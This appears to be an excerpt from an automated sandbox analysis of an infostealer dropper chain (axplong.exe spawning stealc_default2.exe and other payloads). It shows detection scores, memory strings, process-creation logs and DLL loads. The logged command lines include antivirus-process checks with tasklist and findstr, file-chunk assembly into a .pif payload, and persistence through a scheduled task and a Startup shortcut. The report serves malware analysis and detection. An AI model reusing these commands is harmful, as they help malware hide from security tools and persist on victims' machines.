Source: stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000007.00000003.2847758841.00000000210B7000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000003.2829598056.0000000021099000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009816106.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3031244630.0000000003C35000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3007234982.0000000003C3A000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3566796455.0000000003641000.00000004.00000020.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3666088554.0000000003642000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3519340134.00000000054E4000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3397233566.00000000054E7000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3415707622.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 44%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe "C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe "C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe "C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe	Process created: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp" /SL5="$404A0,5239339,56832,C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe "C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe" -i
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe "C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe "C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 260
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe "C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe "C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe "C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe "C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe "C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe"
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe	Process created: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp" /SL5="$404A0,5239339,56832,C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Process created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe "C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe" -i
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 260
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll	Jump to behavior
